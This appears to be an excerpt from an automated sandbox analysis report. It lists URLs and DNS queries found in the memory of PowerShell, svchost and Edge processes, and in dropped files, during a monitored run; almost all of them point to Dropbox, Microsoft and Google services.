Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; media-src https://* blob: ; base-uri 'self' ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; frame-ancestors 'self' https://.dropbox.com ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; img-src https://* data: blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; font-src https:// data: equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: www.dropbox.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com

Source: unknown

HTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message

Source: svchost.exe, 00000004.00000002.2922891188.000001FA56ECE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microso~
Source: svchost.exe, 00000004.00000002.2922629932.000001FA56E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000002.00000002.1858829268.000002394E00E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dropbox.c
Source: powershell.exe, 00000002.00000002.1858829268.000002394E00E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dropbox.com/
Source: svchost.exe, 00000004.00000003.1761645349.000001FA57018000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000004.00000003.1761645349.000001FA57018000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000004.00000003.1761645349.000001FA57018000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000004.00000003.1761645349.000001FA5704D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.4.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000002.00000002.1858829268.000002394FB5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000002.00000002.1907593267.000002395D893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1858829268.000002394DA48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1858829268.000002394E372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.1858829268.000002394D821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1858829268.000002394E372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Amcache.hve.2.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www-env.dropbox-dns.com
Source: powershell.exe, 00000002.00000002.1858829268.000002394DA48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.dropbox.com
Source: powershell.exe, 00000002.00000002.1920514098.0000023965D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000002.00000002.1920514098.0000023965D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000002.00000002.1919183779.0000023965D4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://.VisualC
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://a.sprig.com/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/gsi/client
Source: powershell.exe, 00000002.00000002.1858829268.000002394D821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1858829268.000002394E71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1858829268.000002394E8FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1858829268.000002394EC17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1858829268.000002394F730000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000002.00000002.1858829268.000002394F756000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1858829268.000002394EC17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1858829268.000002394F730000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.login.yahoo.com/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://app.hellofax.com/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://app.hellosign.com/
Source: msedge.exe, 00000003.00000002.1842999381.00000197E9EAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://bard.google.com/
Source: Reporting and NEL.6.dr	String found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://canny.io/sdk.js
Source: offscreendocument_main.js.6.dr, service_worker_bin_prod.js.6.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cfl.dropboxstatic.com/static/
Source: 873972660.exe.2.dr, 996293227.pdf.2.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/js/comments2/index-vflQdvUHu.css
Source: 873972660.exe.2.dr, 996293227.pdf.2.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/js/file_viewer/index.web-vflDar80-.css
Source: 873972660.exe.2.dr, 996293227.pdf.2.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/abuse/fingerprintjs_component-vflTizAkf.c
Source: 873972660.exe.2.dr, 996293227.pdf.2.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/app_actions/index-vflwwzTNE.css
Source: 873972660.exe.2.dr, 996293227.pdf.2.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/index.web-vfl9S1OpT.css
Source: 873972660.exe.2.dr, 996293227.pdf.2.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/tokens-vfltkUjWJ.css
Source: 873972660.exe.2.dr, 996293227.pdf.2.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-illustrations/index.web-vflFaDZOD.css
Source: 873972660.exe.2.dr, 996293227.pdf.2.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/dig/fonts-vflMHuSEC.css
Source: 873972660.exe.2.dr, 996293227.pdf.2.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/error-vflFJkh4x.css
Source: 873972660.exe.2.dr, 996293227.pdf.2.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/foundation-vflH6wwwv.css
Source: 873972660.exe.2.dr, 996293227.pdf.2.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/google_one_tap-vflp9XDLJ.css
Source: 873972660.exe.2.dr, 996293227.pdf.2.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/maestro_appshell_styles-vflfNNLV5.css
Source: 873972660.exe.2.dr, 996293227.pdf.2.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/notify-vfl4oJv2S.css
Source: 873972660.exe.2.dr, 996293227.pdf.2.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/snackbar-vfl0sHK6v.css
Source: 873972660.exe.2.dr, 996293227.pdf.2.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/spectrum/index.web-vflwvsegv.css
Source: 873972660.exe.2.dr, 996293227.pdf.2.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/images/favicon.ico
Source: 873972660.exe.2.dr, 996293227.pdf.2.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/js/alameda_bundle/alameda_bundle_ie_en-vflm4_
Source: 873972660.exe.2.dr, 996293227.pdf.2.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/typescript/component_libraries/dig-experimental/src/index.web-v
Source: 873972660.exe.2.dr, 996293227.pdf.2.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/typescript/component_libraries/dwg-components/src/index.web-vfl
Source: Web Data.6.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Web Data.6.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Network Persistent State0.6.dr	String found in binary or memory: https://chrome.cloudflare-dns.com
Source: msedge.exe, 00000003.00000002.1853902272.000013240237C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: manifest.json.6.dr	String found in binary or memory: https://chrome.google.com/webstore/
Source: msedge.exe, 00000003.00000002.1853902272.000013240237C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.6.dr	String found in binary or memory: https://chromewebstore.google.com/
Source: a690689c-85fb-442e-bb9a-eee103f6b6a2.tmp.7.dr	String found in binary or memory: https://clients2.google.com
Source: msedge.exe, 00000003.00000002.1849356073.0000132402240000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.6.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: a690689c-85fb-442e-bb9a-eee103f6b6a2.tmp.7.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: powershell.exe, 00000002.00000002.1907593267.000002395D893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1907593267.000002395D893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1907593267.000002395D893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl-web.dropbox.com/
Source: manifest.json0.6.dr	String found in binary or memory: https://docs.google.com/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/fsip/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/fsip/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/fsip/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.sandbox.google.com/document/fsip/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docsend.com/
Source: manifest.json0.6.dr	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json0.6.dr	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json0.6.dr	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json0.6.dr	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: manifest.json0.6.dr	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json0.6.dr	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json0.6.dr	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: manifest.json0.6.dr	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json0.6.dr	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json0.6.dr	String found in binary or memory: https://drive-staging.corp.google.com/
Source: manifest.json0.6.dr	String found in binary or memory: https://drive.google.com/
Source: powershell.exe, 00000002.00000002.1858829268.000002394E00E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dropbox.com/
Source: Web Data.6.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Web Data.6.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Web Data.6.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 000003.log8.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: 000003.log7.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
Source: HubApps Icons.6.dr, 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
Source: HubApps Icons.6.dr, 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
Source: HubApps Icons.6.dr, 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
Source: 000003.log8.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
